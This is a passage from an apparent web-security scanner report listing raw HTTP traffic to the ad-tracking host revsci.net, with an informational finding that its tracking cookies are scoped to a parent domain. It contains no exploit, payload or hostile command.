29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z4Oss1gPYbtKdFKliortn5vw/ZgkGNdTd0q7tfEV6W8KbgxSTtLgyIUReTfvF7ywFO3PlFnZnuAmtQtD+EMy9q9rOgoHmIAWmnFDjxFv0B++CCnphzufoPR9Zq4aMm7FGZcwXFxRUEu+i+KvSI1gnqJcPOjsSrYe+3esiiicrZLD92NHoFX5y4Imzr1vDFC7Yy0/MmI3gRgwg39moeiOOZUiS9NtUjMBoUsgpqkUr8rFPfrm8SpaIJTzT2f02aWo/GFqRdvrqbs7cRZ5JqE84MepJBXfkRD5/rCGR23XtLWuwS8kkH2hVcB4E0fniwmFyk3mbqXsnQbsWoMc3zoOC3ZA4awVLltq9ZAPRLwfcN0b+eq5UHYwtsZA9tjdvE0R7Ty7q4R4yk7Oixp0V38PVHh2Ez4WnCYmmvI0ZNM7cndia0RdjXQ9SGNdOlGv5VgaJc//A+bB7bleJc9aDc+3JweIGeTdlvf62JrOm/agKJukYxdA+JvZX4mxqgZL6C9rt5Eqwg9FxoY0uUYfnW; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:43 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 729

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_72078'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
9.71. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/306691632.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/306691632.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages%253Fzipcode%253Dundefined%2526age%253Dnull%2526gender%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dnewspaper%2520%253E%2520news%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+heAIMpTaxq2F29/wEqICTC+brKKetXjEYxEHjqS7MnHaRoUlyJPW5vrupC8lCy9ehMcr4ODX4dHdKCYd/6y296vcGNEHfOnzJmYoq5HbvUag4QdvsB/TUdj97Y2l4hX6POJLvxOP5q4MMsb0mFfZnJD5FY+evU/J9EwIoHF6Ryogng+mKbzxZbyyINuKOL587OsIT8jeFhm5ylsZ7zOhHCu4TeF8pc3gTw/vYSsm4r45Z2ho7FmtfNtdxEQKHkNamcv3FsbbryorVcz7sKAPVMqaKbhfFllHqJzyxIFBoc+mKfq2EsN4XWKT6n1/HFvSFWLrjasZj/i4XnGahI+mfpY9ze4yT6Fukh+2dat0dsd5Az1U7XymvwdaUjFbT9uOwMmm16NS5hFRSnjnoXFW4CQf+gsTKK+yDjOzwsxv/qEqvN4mYoytFphSsb6P6VYeoZUAFC0iJViSnGkEoTohDSBkmpV9lXsjVfSk06Grg/75Qf9qa99ABoptQWJO2OK3W0h0tVPjjp66vSIysMCV04DrntT6KsP3P+yzwSqNhUD2VMbIyFMooyg==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mGHo=MLvntzUpZghnJ5G+i+4DV0q7j9FMVCqRtwDvSy+4/qSYgqJKSe72X4w1OsoqG1L6pBK4c+pnxqlazyrETdH5Ss7ZqlAdp3dLz6RiXrd8bWUl0XLFTZoGRlkMvbxWlLJYvRKeW3BPG7e9ZE9B61Tr0Xu8xr7ySWl2ozQ4/U5ZrZxIJ7kQJbMCJWim30MttesFLXZH5EHs6+uRDgRTkZlnHHCB77Ar7hGyOMIesNI9o8/9RNCHjTBvKoYXcOvvnUc3gREPcmtRhgTUBzhJDfhW9iRzZqad1BMkEEMigM51rz87fTY2vzp0koSexDIeushDPwx5lSSemwqHa5nCxRqJDEJhHQKSLfJHzzuMS4QVFpr7//ar/gYMlqPHm+a7O2rKfqFedotktJgoyGoTtvvVeB1WgObPStSqC654B4pjqVzgkVcIp5vS64Z3X4Vwz7RGYuKOb0DaoyX1X76ErVivTuwcME8UIBHjBcbckhVImU4XnKI4J4bfm8SzPc7fEarHQ8eNRbt+NBqpHVfT8CA7WCswlaUKX5R2m/uP1k7D7OapV5fM7s4PFkZLVBzums11/pRTr+vH3zlZ2D1U6oJOxBq6h1nGt8lsO3aycDlfPhTnFCbJtqhd+R8M00mgvtcV2kPHAZhTBULpYa3VoOxt75s7s+OXEMD8kJDhqhAW0xOaaqojt1m2kfCd2fjCHuHb0cRul18AwkGu6zC9b5gjvQWYaAWvEuTjULQnF3/WBu3xoBmBW78cFOqZVsnCJpwlzNwpDnZ/nr094/gLpsTcBz9U0VyWch6xgNeriVs3uCZ+hcbdM5qZSIVPm40FjrdWmJOt2Ypv3a/kl5qli5IOjokQLYqfkHaXdYfke+D9DK5fPp0x3F/DMW5VklD0s2klQ6FvQ8nGV4uNs6prIO+bLFyIVZRDiExpXuh+i+Aq1YmAP/ufHvFjsYKn3OEk5XDAygQ1YpMtM5Sk37DHiy1Oc7bt3PwrwRKxpdfhkxPbOgtaPJkKIgXA1UHBSrD2OZEGtvDFWcANJwDR0VNWid5NgBAB0rwWy6Z9LlselJpaiIgXIaF5h7wv7cU7Y0uZfy2iNM4rSYzqVMnAijA51U4o2W5ntA6EoeSq35Bx9QMDeHIURaKeaZsajRx5lGVOxUpye6PvZN0uuGaga4RrhslZMB2Y9+AWtEFXlROcqQmBVEWszH66koC2U73qDz/yRQrV2HzX7gNGvoPo58JQSjatu9X7ji5cy1E8461WWwOgVp2IkrMWGs11l2+HIs523HQXWBw52AChb40Qk34XWJQuyHfZL9BKo9bD6pY3NmKKLrvbGYtN9z9spKNvqELg64UUhZHAp4leheD4a45ZJaEWok/2mPfmsjSGHyI+cNW11/VKbLveqgLdpHuwgIOrGn+E8XL1rY/dmTnJljXVje3GS73qe0gFIUORmV3zEUoMu8lptwsGFRNaLlIlfH4o/sxxcLaUBc19572hk00yHldk+1d96w8WPNpYQKcbuFCWBQC1EktKTN64aS3+Ym84VuWwrnmLsUd+YZBuBFuReQ3pxDY7f9Wawu8mnlboSNWsLrjMJt5gOyEZGvTAlzDiB1dDEroCTz/E9E4GpyJPKfuKLsHuCzLY21x7DZuu5S8mZ7fh28cQxt+2YLsEHn6UBTWD6KoqxACfoIaPep7kzEs=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=MLv39S8pLipr557JcaE6yAV6rsvwpilMo4IXeAwquaRybQYECDUgDLKZcrtp+fSv+Kv8zwptsA0XKpUy7HBR0/FP1LWEh4VBn8RQKgG1Jl2axyTANa3oP9nI5ve45EGiWh9Sl6iFkM3Zn4EL3+sUxrCfghQpknxyU1jd7+S5yLCbsj+1OFD+aVulqZhDIHtO1fmlkEweR/oQf+X9G8N6KIBLzbafY5Xxm2tCUkjBkJZ/Wd7uHPSPg7Zg7RoQmJ3O+XHxIVD/v7sFXCy9JGnICxoeBIIkhJwhb/PWqt9lGmZWbUzK0rIweM30j8C21o0fOUQmurYcgouTou4TFLbI4lQZ1kO0EyUCLGrP/XBqZiIEVXq4SYb6fzmRS+wyQum7qFWWDXX+x587vHctOQDNqJT99KvyBLa9BM8WDZzjtTB5qGiSfDXn7JG014dYb9/r58Vl/RlZz1cFRA2+CV5qnnJV+VUpKIuRPQ+S4E6r3YYXbT3vWeDASYs3TRpgPz2WbAwtezXTCQNZmakONCVtwV34fTEwsDm02I/Kkdi5iO/Ogp7wYPugmyecctFFcu7w0d5AkuLRkWrm4znT7x5QDMsXvbfjq28uoXLhty4funVrOjX2AxtU7nhBAEB/cxKn8rCdaxEyNnyvZsMRj6knGyDs/UqXdC8Nak/6K/Bpq9XPItguKY/eXp/cUAy/SnwDM60mCzOEgcjDwwk4kGDFcuXwMlFyUTdf9aXpue5o4qc6SkNOQMUSgMRcxD+ZiO3IhfCNDu+qUbosXm0Y0Jk456/rjrkzzF2a0UKzeAwazNZfir2djSN9zhhqqiI8IVTmdg9kMr35BAQqoYnUDg7pR+rnW8ft0kt/DUTaKqms6kynaJYO+sZ+fUlOpZjWPeAfLRQlNOhyY3GOTh+uVqhsVaoqTRqSWnSNkbfumeGvbXPye12/bZ0SkP4rZ7q82ccniej55lG4/yMKnb1cFmca3crDCyMPTb61By3RIJhNlDC/iLX9hcRmn8Vpq/S+koinK3Myi0+6cIUKtxI1FfGx1HeIsTKskbad+KOwIU/oFassZ+W0ij0JQo8+lcK1uqEF+tjLEwGGHoe5UID/ImippNwxev+aeym6TabxFDPf4tPKFgyVLvrw61qMEi3Iy8+A2h4Iyq332msEqwAXnYJvdndEVKh2ylvSl+F+7qo0BkbvNguFwmdxpwNlESXYu15Bm9mZjIHD+l3VV6E2EEiSInQE6GvFiAywxdeyN/XGIWo1NrRnQCG3YQj4t87H5slGjT4D6NFOI807ITiQXMAo5xDF15nd0FzNrJ6UAx8